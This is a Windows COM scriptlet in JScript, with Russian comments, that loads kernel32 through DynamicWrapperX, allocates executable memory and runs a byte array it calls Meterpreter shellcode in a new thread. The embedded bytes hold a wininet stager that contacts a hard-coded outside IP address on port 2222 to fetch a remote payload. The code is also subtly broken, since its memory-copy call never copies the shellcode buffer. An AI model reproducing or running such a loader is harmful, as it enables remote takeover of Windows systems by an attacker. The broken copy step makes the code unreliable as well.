<scriptlet>
  <registration
    progid="Example.Scriptlet"
    classid="{FF48DBA4-60EF-11D0-B508-00A0C90F2734}">
    <script language="JScript">
      <![CDATA[
        // Используем DynamicWrapperX для вызова нативных функций
        var kernel32 = new ActiveXObject("DynamicWrapperX").Create("kernel32.dll");
        kernel32.Register("VirtualAlloc","kernel32.dll","UIntPtr VirtualAlloc(UIntPtr,UIntPtr,UInt32,UInt32)","stdcall");
        kernel32.Register("CreateThread","kernel32.dll","UIntPtr CreateThread(UIntPtr,UInt32,UIntPtr,UIntPtr,UInt32,UInt32&)","stdcall");
        kernel32.Register("WaitForSingleObject","kernel32.dll","UInt32 WaitForSingleObject(UIntPtr,UInt32)","stdcall");
        kernel32.Register("CopyMemory","kernel32.dll","Void CopyMemory(UIntPtr,UIntPtr,UIntPtr)","stdcall");

        // Весь shellcode Meterpreter
        var buf = [
          0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x00,0x00,0x00,0x41,0x51,0x41,0x50,
          0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,
          0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x4d,0x31,0xc9,0x48,0x0f,
          0xb7,0x4a,0x4a,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,
          0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,
          0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x66,0x81,0x78,0x18,0x0b,0x02,0x0f,
          0x85,0x72,0x00,0x00,0x00,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,
          0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,
          0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,
          0x4d,0x31,0xc9,0x48,0x31,0xc0,0x41,0xc1,0xc9,0x0d,0xac,0x41,0x01,0xc1,
          0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,
          0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,0x44,
          0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,
          0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,
          0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,
          0x4b,0xff,0xff,0xff,0x5d,0x48,0x31,0xdb,0x53,0x49,0xbe,0x77,0x69,0x6e,
          0x69,0x6e,0x65,0x74,0x00,0x41,0x56,0x48,0x89,0xe1,0x49,0xc7,0xc2,0x4c,
          0x77,0x26,0x07,0xff,0xd5,0x53,0x53,0xe8,0x77,0x00,0x00,0x00,0x4d,0x6f,
          0x7a,0x69,0x6c,0x6c,0x61,0x2f,0x35,0x2e,0x30,0x20,0x28,0x4d,0x61,0x63,
          0x69,0x6e,0x74,0x6f,0x73,0x68,0x3b,0x20,0x49,0x6e,0x74,0x65,0x6c,0x20,
          0x4d,0x61,0x63,0x20,0x4f,0x53,0x20,0x58,0x20,0x31,0x34,0x5f,0x37,0x5f,
          0x32,0x29,0x20,0x41,0x70,0x70,0x6c,0x65,0x57,0x65,0x62,0x4b,0x69,0x74,
          0x2f,0x36,0x30,0x35,0x2e,0x31,0x2e,0x31,0x35,0x20,0x28,0x4b,0x48,0x54,
          0x4d,0x4c,0x2c,0x20,0x6c,0x69,0x6b,0x65,0x20,0x47,0x65,0x63,0x6b,0x6f,
          0x29,0x20,0x56,0x65,0x72,0x73,0x69,0x6f,0x6e,0x2f,0x31,0x37,0x2e,0x34,
          0x2e,0x31,0x20,0x53,0x61,0x66,0x61,0x72,0x69,0x2f,0x36,0x30,0x35,0x2e,
          0x31,0x2e,0x31,0x35,0x00,0x59,0x53,0x5a,0x4d,0x31,0xc0,0x4d,0x31,0xc9,
          0x53,0x53,0x49,0xba,0x3a,0x56,0x79,0xa7,0x00,0x00,0x00,0x00,0xff,0xd5,
          0xe8,0x0e,0x00,0x00,0x00,0x38,0x39,0x2e,0x31,0x31,0x30,0x2e,0x38,0x31,
          0x2e,0x31,0x30,0x33,0x00,0x5a,0x48,0x89,0xc1,0x49,0xc7,0xc0,0xae,0x08,
          0x00,0x00,0x4d,0x31,0xc9,0x53,0x53,0x6a,0x03,0x53,0x49,0xba,0x57,0x89,
          0x9f,0xc6,0x00,0x00,0x00,0x00,0xff,0xd5,0xe8,0x7f,0x00,0x00,0x00,0x2f,
          0x50,0x41,0x4b,0x61,0x78,0x69,0x73,0x58,0x68,0x58,0x49,0x31,0x55,0x44,
          0x52,0x53,0x58,0x54,0x6b,0x34,0x36,0x51,0x34,0x71,0x52,0x68,0x44,0x46,
          0x4a,0x36,0x73,0x79,0x4c,0x66,0x36,0x30,0x66,0x51,0x45,0x68,0x6b,0x77,
	  0x6b,0x45,0x34,0x38,0x6d,0x66,0x73,0x73,0x57,0x78,0x52,0x70,0x67,0x57,
	  0x66,0x5a,0x35,0x4b,0x30,0x66,0x52,0x70,0x74,0x78,0x79,0x31,0x31,0x30,
	  0x47,0x31,0x74,0x34,0x4f,0x4f,0x78,0x5a,0x78,0x46,0x41,0x44,0x37,0x61,
	  0x36,0x59,0x59,0x32,0x6d,0x76,0x2d,0x66,0x38,0x41,0x67,0x6e,0x6f,0x67,
	  0x43,0x4c,0x79,0x44,0x52,0x5f,0x51,0x37,0x52,0x72,0x54,0x61,0x51,0x63,
	  0x64,0x36,0x30,0x53,0x39,0x58,0x6c,0x65,0x4d,0x42,0x2d,0x4b,0x6c,0x00
        ];

        // Выделяем память, копируем и запускаем shellcode
        var ptr = kernel32.VirtualAlloc(0, buf.length, 0x3000, 0x40);
        kernel32.CopyMemory(ptr, ptr.add(buf.length), buf.length);
        var tid = new Array();
        var hThread = kernel32.CreateThread(0,0,ptr,0,0,tid);
        kernel32.WaitForSingleObject(hThread, 0xFFFFFFFF);
      ]]>
    </script>
  </registration>
</scriptlet>
